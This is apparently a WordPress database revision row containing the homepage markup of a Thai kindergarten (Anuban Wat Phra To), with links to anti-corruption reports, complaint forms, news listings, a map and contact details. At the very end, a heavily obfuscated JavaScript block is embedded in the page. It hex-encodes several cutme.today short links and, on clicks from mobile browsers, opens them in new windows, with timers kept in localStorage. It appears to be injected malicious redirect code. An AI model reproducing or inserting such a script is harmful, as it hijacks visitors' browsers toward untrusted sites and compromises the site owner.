{\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 17:14:46','2025-07-15 10:14:46','',19,'http://watprato.ssk.in.th/?p=727',0,'revision','',0),
